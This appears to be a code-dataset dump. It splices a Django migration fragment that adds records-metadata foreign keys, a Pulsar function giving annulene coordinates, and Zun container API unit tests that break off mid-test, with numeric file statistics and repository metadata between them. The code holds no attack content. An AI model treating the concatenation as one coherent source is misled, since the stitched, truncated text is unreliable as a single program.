field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.PublicityClass', verbose_name='publicity class'),
),
migrations.AddField(
model_name='function',
name='retention_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.RetentionPeriod', verbose_name='retention period'),
),
migrations.AddField(
model_name='function',
name='retention_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.RetentionReason', verbose_name='retention reason'),
),
migrations.AddField(
model_name='function',
name='security_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.SecurityPeriod', verbose_name='security period'),
),
migrations.AddField(
model_name='function',
name='security_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.SecurityReason', verbose_name='security reason'),
),
migrations.AddField(
model_name='function',
name='social_security_number',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='functions', to='metarecord.SocialSecurityNumber', verbose_name='social security number'),
),
migrations.AddField(
model_name='action',
name='personal_data',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.PersonalData', verbose_name='personal data'),
),
migrations.AddField(
model_name='action',
name='phase',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.Phase', verbose_name='phase'),
),
migrations.AddField(
model_name='action',
name='protection_class',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.ProtectionClass', verbose_name='protection class'),
),
migrations.AddField(
model_name='action',
name='publicity_class',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.PublicityClass', verbose_name='publicity class'),
),
migrations.AddField(
model_name='action',
name='retention_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.RetentionPeriod', verbose_name='retention period'),
),
migrations.AddField(
model_name='action',
name='retention_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.RetentionReason', verbose_name='retention reason'),
),
migrations.AddField(
model_name='action',
name='security_period',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.SecurityPeriod', verbose_name='security period'),
),
migrations.AddField(
model_name='action',
name='security_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.SecurityReason', verbose_name='security reason'),
),
migrations.AddField(
model_name='action',
name='social_security_number',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='actions', to='metarecord.SocialSecurityNumber', verbose_name='social security number'),
),
]
| 70.396067
| 238
| 0.662184
| 2,705
| 25,061
| 5.960444
| 0.042514
| 0.083235
| 0.052968
| 0.083235
| 0.922533
| 0.904918
| 0.900577
| 0.882342
| 0.879179
| 0.875581
| 0
| 0.003116
| 0.205938
| 25,061
| 355
| 239
| 70.594366
| 0.807085
| 0.002673
| 0
| 0.639769
| 1
| 0
| 0.204474
| 0.050818
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017291
| 0
| 0.028818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fbfdcef145348dbdc97530179e7a68b156247005
| 2,198
|
py
|
Python
|
lib/systems/annulene.py
|
pulsar-chem/BPModule
|
f8e64e04fdb01947708f098e833600c459c2ff0e
|
[
"BSD-3-Clause"
] | null | null | null |
lib/systems/annulene.py
|
pulsar-chem/BPModule
|
f8e64e04fdb01947708f098e833600c459c2ff0e
|
[
"BSD-3-Clause"
] | null | null | null |
lib/systems/annulene.py
|
pulsar-chem/BPModule
|
f8e64e04fdb01947708f098e833600c459c2ff0e
|
[
"BSD-3-Clause"
] | null | null | null |
import pulsar as psr
def load_ref_system():
""" Returns annulene as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
C 2.59675 1.49923 0.00000
C 2.59675 -1.49923 0.00000
C 0.00000 2.99846 0.00000
C 3.79405 0.72309 0.00000
C 2.52324 2.92420 0.00000
C 3.79405 -0.72309 0.00000
C 1.27081 3.64729 0.00000
C -0.00000 -2.99846 -0.00000
C -2.59675 1.49923 -0.00000
C 2.52324 -2.92420 0.00000
C -1.27081 3.64729 -0.00000
C -2.59675 -1.49923 -0.00000
C 1.27081 -3.64729 0.00000
C -2.52324 2.92420 -0.00000
C -1.27081 -3.64729 -0.00000
C -3.79405 0.72309 -0.00000
C -2.52324 -2.92420 -0.00000
C -3.79405 -0.72309 -0.00000
H 4.74967 1.23835 0.00000
H 3.44728 3.49416 0.00000
H 4.74967 -1.23835 0.00000
H 1.30239 4.73251 0.00000
H 3.44728 -3.49416 0.00000
H -1.30239 4.73251 -0.00000
H 1.30239 -4.73251 0.00000
H -3.44728 3.49416 -0.00000
H -1.30239 -4.73251 -0.00000
H -4.74967 1.23835 -0.00000
H -3.44728 -3.49416 -0.00000
H -4.74967 -1.23835 -0.00000
H 1.68959 0.97548 0.00000
H 1.68959 -0.97548 0.00000
H 0.00000 1.95097 0.00000
H -0.00000 -1.95097 -0.00000
H -1.68959 0.97548 -0.00000
H -1.68959 -0.97548 -0.00000
""")
| 49.954545
| 64
| 0.375341
| 281
| 2,198
| 2.925267
| 0.181495
| 0.291971
| 0.153285
| 0.077859
| 0.832117
| 0.832117
| 0.832117
| 0.832117
| 0.832117
| 0.816302
| 0
| 0.640316
| 0.539581
| 2,198
| 43
| 65
| 51.116279
| 0.171937
| 0.047771
| 0
| 0
| 0
| 0
| 0.959479
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025
| true
| 0
| 0.025
| 0
| 0.075
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
2202cd45f3b541bef25d702ef049e7fb4bc56f42
| 115,023
|
py
|
Python
|
zun/tests/unit/api/controllers/v1/test_containers.py
|
ZhaiMengdong/zun
|
2c76e26335a9fd8ffb6624563dd5015278b01da9
|
[
"Apache-2.0"
] | 3
|
2018-09-07T02:31:05.000Z
|
2018-10-17T10:30:47.000Z
|
zun/tests/unit/api/controllers/v1/test_containers.py
|
ZhaiMengdong/zun
|
2c76e26335a9fd8ffb6624563dd5015278b01da9
|
[
"Apache-2.0"
] | null | null | null |
zun/tests/unit/api/controllers/v1/test_containers.py
|
ZhaiMengdong/zun
|
2c76e26335a9fd8ffb6624563dd5015278b01da9
|
[
"Apache-2.0"
] | 1
|
2018-09-07T02:26:23.000Z
|
2018-09-07T02:26:23.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from mock import patch
from webtest.app import AppError
from neutronclient.common import exceptions as n_exc
from oslo_utils import uuidutils
from zun.common import exception
from zun import objects
from zun.tests.unit.api import base as api_base
from zun.tests.unit.db import utils
from zun.tests.unit.objects import utils as obj_utils
class TestContainerController(api_base.FunctionalTest):
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_run_container(self, mock_search, mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
response = self.post('/v1/containers?run=true',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertTrue(mock_container_create.called)
self.assertTrue(mock_container_create.call_args[1]['run'] is True)
mock_neutron_get_network.assert_called_once()
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_run_container_wrong_run_value(self, mock_search,
mock_container_create):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self.post('/v1/containers?run=xyz', params=params,
content_type='application/json')
@patch('zun.compute.api.API.container_create')
def test_run_container_wrong_memory_value(self, mock_container_create):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "3",'
'"environment": {"key1": "val1", "key2": "val2"}}')
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self.post('/v1/containers?run=xyz', params=params,
content_type='application/json')
@patch('zun.compute.api.API.container_create')
def test_run_container_wrong_cpu_value(self, mock_container_create):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512", "cpu": "100"'
'"environment": {"key1": "val1", "key2": "val2"}}')
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self.post('/v1/containers?run=xyz', params=params,
content_type='application/json')
@patch('zun.compute.api.API.container_create')
def test_run_container_wrong_disk_value(self, mock_container_create):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512", "disk": "0"'
'"environment": {"key1": "val1", "key2": "val2"}}')
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self.post('/v1/containers?run=xyz', params=params,
content_type='application/json')
def test_run_container_runtime_wrong_api_version(self):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": "env", "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"runtime": "runc"}')
headers = {"OpenStack-API-Version": "container 1.4"}
with self.assertRaisesRegex(AppError,
"Invalid param runtime"):
self.post('/v1/containers?run=true',
params=params, content_type='application/json',
headers=headers)
def test_run_container_runtime_wrong_value(self):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"runtime": 1234}')
with self.assertRaisesRegex(AppError,
"Invalid input for field"):
self.post('/v1/containers?run=true',
params=params, content_type='application/json')
def test_run_container_with_hostname_wrong_api_version(self):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": "env", "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"hostname": "testhost"}')
headers = {"OpenStack-API-Version": "container 1.7"}
with self.assertRaisesRegex(AppError,
"Invalid param hostname"):
self.post('/v1/containers?run=true',
params=params, content_type='application/json',
headers=headers)
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_run_container_with_false(self, mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
response = self.post('/v1/containers?run=false',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertTrue(mock_container_create.called)
self.assertTrue(mock_container_create.call_args[1]['run'] is False)
mock_neutron_get_network.assert_called_once()
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_run_container_with_wrong(self, mock_search,
mock_container_create):
mock_container_create.side_effect = exception.InvalidValue
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
self.assertRaises(AppError, self.post, '/v1/containers?run=wrong',
params=params, content_type='application/json')
self.assertTrue(mock_container_create.not_called)
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container(self, mock_search, mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertNotIn('host', response.json)
self.assertTrue(mock_container_create.called)
self.assertTrue(mock_container_create.call_args[1]['run'] is False)
mock_neutron_get_network.assert_called_once()
@patch('zun.common.context.RequestContext.can')
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_by_admin(
self, mock_search, mock_container_create, mock_neutron_get_network,
mock_can):
mock_container_create.side_effect = lambda x, y, **z: y
mock_can.return_value = True
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertIn('host', response.json)
self.assertTrue(mock_container_create.called)
self.assertTrue(mock_container_create.call_args[1]['run'] is False)
mock_neutron_get_network.assert_called_once()
@patch('zun.compute.api.API.container_create')
def test_create_container_image_not_specified(self, mock_container_create):
params = ('{"name": "MyDocker",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
with self.assertRaisesRegex(AppError,
"is a required property"):
self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertTrue(mock_container_create.not_called)
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_set_project_id_and_user_id(
self, mock_search, mock_container_create,
mock_neutron_get_network):
def _create_side_effect(cnxt, container, **kwargs):
self.assertEqual(self.context.project_id, container.project_id)
self.assertEqual(self.context.user_id, container.user_id)
return container
mock_container_create.side_effect = _create_side_effect
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
self.post('/v1/containers/',
params=params,
content_type='application/json')
mock_neutron_get_network.assert_called_once()
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_resp_has_status_reason(self, mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertIn('status_reason', response.json.keys())
mock_neutron_get_network.assert_called_once()
@patch('zun.common.policy.enforce')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.container_delete')
@patch('zun.volume.cinder_api.CinderAPI.search_volume')
@patch('zun.volume.cinder_api.CinderAPI.ensure_volume_usable')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_full_params(self, mock_search,
mock_ensure_volume_usable,
mock_search_volume,
mock_container_delete,
mock_container_create,
mock_neutron_get_network,
mock_policy):
mock_policy.return_value = True
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
fake_volume_id = 'fakevolid'
fake_volume = mock.Mock(id=fake_volume_id)
mock_search_volume.return_value = fake_volume
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"runtime": "runc", "hostname": "testhost",'
'"disk": 20, "restart_policy": {"Name": "no"},'
'"nets": [{"network": "testpublicnet"}],'
'"mounts": [{"source": "s", "destination": "d"}]}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('512', c.get('memory'))
self.assertEqual({"key1": "val1", "key2": "val2"},
c.get('environment'))
self.assertEqual('runc', c.get('runtime'))
self.assertEqual('testhost', c.get('hostname'))
self.assertEqual(20, c.get('disk'))
self.assertEqual({"Name": "no", "MaximumRetryCount": "0"},
c.get('restart_policy'))
self.assertNotIn('host', c)
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
requested_volumes = \
mock_container_create.call_args[1]['requested_volumes']
self.assertEqual(1, len(requested_volumes))
self.assertEqual(fake_volume_id, requested_volumes[0].volume_id)
# Delete the container we created
def side_effect(*args, **kwargs):
(ctx, cnt, force) = args
cnt.destroy(ctx)
mock_container_delete.side_effect = side_effect
response = self.delete(
'/v1/containers/%s?force=True' % c.get('uuid'))
self.assertEqual(204, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
c = response.json['containers']
self.assertEqual(0, len(c))
self.assertTrue(mock_container_create.called)
mock_neutron_get_network.assert_called_once()
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_minimum_params(self,
mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
# Create a container with a command
params = ('{"image": "ubuntu"}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertIsNotNone(c.get('name'))
self.assertIsNone(None, c.get('command'))
self.assertEqual('2048', c.get('memory'))
self.assertEqual(1.0, c.get('cpu'))
# TODO(kiennt): Uncomment it when bug [1] be resolved.
# At this time, limit disk size feature will be ready.
# [1] https://bugs.launchpad.net/zun/+bug/1746401
# self.assertEqual(10, c.get('disk'))
self.assertEqual({}, c.get('environment'))
self.assertIsNone(c.get('runtime'))
self.assertIsNone(c.get('hostname'))
self.assertEqual({}, c.get('restart_policy'))
self.assertNotIn('host', c)
mock_neutron_get_network.assert_called_once()
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_availability_zone(
self, mock_search, mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"],'
'"availability_zone": "test-az"}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('2048', c.get('memory'))
self.assertEqual(1.0, c.get('cpu'))
# TODO(kiennt): Uncomment it when bug [1] be resolved.
# At this time, limit disk size feature will be ready.
# [1] https://bugs.launchpad.net/zun/+bug/1746401
# self.assertEqual(10, c.get('disk'))
self.assertEqual({}, c.get('environment'))
self.assertNotIn('host', c)
mock_neutron_get_network.assert_called_once()
extra_spec = \
mock_container_create.call_args[1]['extra_spec']
self.assertEqual('test-az', extra_spec['availability_zone'])
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_restart_policy_no_retry_0(
self,
mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"restart_policy": {"Name": "no",'
'"MaximumRetryCount": "0"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('512', c.get('memory'))
self.assertEqual({"Name": "no", "MaximumRetryCount": "0"},
c.get('restart_policy'))
self.assertNotIn('host', c)
mock_neutron_get_network.assert_called_once()
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_restart_policy_no_retry_6(
self,
mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"restart_policy": {"Name": "no",'
'"MaximumRetryCount": "6"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('512', c.get('memory'))
self.assertEqual({"Name": "no", "MaximumRetryCount": "0"},
c.get('restart_policy'))
self.assertNotIn('host', c)
mock_neutron_get_network.assert_called_once()
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_restart_policy_unless_stopped(
self,
mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"restart_policy": {"Name": "unless-stopped",'
'"MaximumRetryCount": "0"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('512', c.get('memory'))
self.assertEqual({"Name": "unless-stopped", "MaximumRetryCount": "0"},
c.get('restart_policy'))
self.assertNotIn('host', c)
mock_neutron_get_network.assert_called_once()
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
@patch('zun.common.policy.enforce')
@patch('neutronclient.v2_0.client.Client.show_port')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.network.neutron.NeutronAPI.get_neutron_port')
@patch('zun.network.neutron.NeutronAPI.ensure_neutron_port_usable')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.container_delete')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_requested_neutron_port(
self, mock_search, mock_container_delete, mock_container_create,
mock_ensure_port_usable, mock_get_port,
mock_get_network, mock_show_port, mock_policy):
mock_policy.return_value = True
mock_container_create.side_effect = lambda x, y, **z: y
fake_port = {'network_id': 'foo', 'id': 'bar'}
fake_private_network = {'router:external': False, 'shared': False}
mock_get_port.return_value = fake_port
mock_get_network.return_value = fake_private_network
mock_show_port.return_value = {'port': fake_port}
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"nets": [{"port": "testport"}]}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('512', c.get('memory'))
self.assertEqual({"key1": "val1", "key2": "val2"},
c.get('environment'))
self.assertNotIn('host', c)
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_port['network_id'],
requested_networks[0]['network'])
self.assertEqual(fake_port['id'], requested_networks[0]['port'])
self.assertTrue(requested_networks[0]['preserve_on_delete'])
def side_effect(*args, **kwargs):
(ctx, cnt, force) = args
cnt.destroy(ctx)
# Delete the container we created
mock_container_delete.side_effect = side_effect
response = self.delete(
'/v1/containers/%s?force=True' % c.get('uuid'))
self.assertEqual(204, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
c = response.json['containers']
self.assertEqual(0, len(c))
self.assertTrue(mock_container_create.called)
@patch('zun.compute.api.API.container_create')
@patch('zun.common.context.RequestContext.can')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.network.neutron.NeutronAPI.ensure_neutron_port_usable')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_public_network(
self, mock_search, mock_ensure_port_usable, mock_get_network,
mock_authorize, mock_container_create):
fake_public_network = {'id': 'fakepubnetid',
'router:external': True,
'shared': False}
mock_get_network.return_value = fake_public_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"nets": [{"network": "testpublicnet"}]}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
fake_admin_authorize = True
mock_authorize.return_value = fake_admin_authorize
self.assertEqual(202, response.status_int)
fake_not_admin_authorize = False
mock_authorize.return_value = fake_not_admin_authorize
response = self.post('/v1/containers/',
params=params,
content_type='application/json',
expect_errors=True)
self.assertEqual(403, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual(
"It is not allowed to create an interface on external network %s" %
fake_public_network['id'], response.json['errors'][0]['detail'])
self.assertTrue(mock_container_create.not_called)
@patch('zun.compute.api.API.container_create')
@patch('zun.common.context.RequestContext.can')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.network.neutron.NeutronAPI.ensure_neutron_port_usable')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_ip_addr(
self, mock_search, mock_ensure_port_usable, mock_get_network,
mock_authorize, mock_container_create):
fake_network = {'id': 'fakenetid'}
mock_get_network.return_value = fake_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"nets": [{"network": "fakenetid", "v4-fixed-ip": '
'"10.0.0.10"}]}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
fake_admin_authorize = True
mock_authorize.return_value = fake_admin_authorize
self.assertEqual(202, response.status_int)
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_show')
@patch('zun.compute.api.API.container_create')
@patch('zun.common.context.RequestContext.can')
@patch('zun.volume.cinder_api.CinderAPI.create_volume')
@patch('zun.volume.cinder_api.CinderAPI.ensure_volume_usable')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_create_new_volume(
self, mock_search, mock_ensure_volume_usable, mock_create_volume,
mock_authorize, mock_container_create, mock_container_show,
mock_neutron_get_network):
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
fake_volume_id = 'fakevolid'
fake_volume = mock.Mock(id=fake_volume_id)
mock_create_volume.return_value = fake_volume
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"mounts": [{"destination": "d", '
'"size": "5"}]}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
# get all containers
container = objects.Container.list(self.context)[0]
container.status = 'Creating'
mock_container_show.return_value = container
response = self.app.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('Creating', c.get('status'))
self.assertEqual('512', c.get('memory'))
self.assertIn('host', c)
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
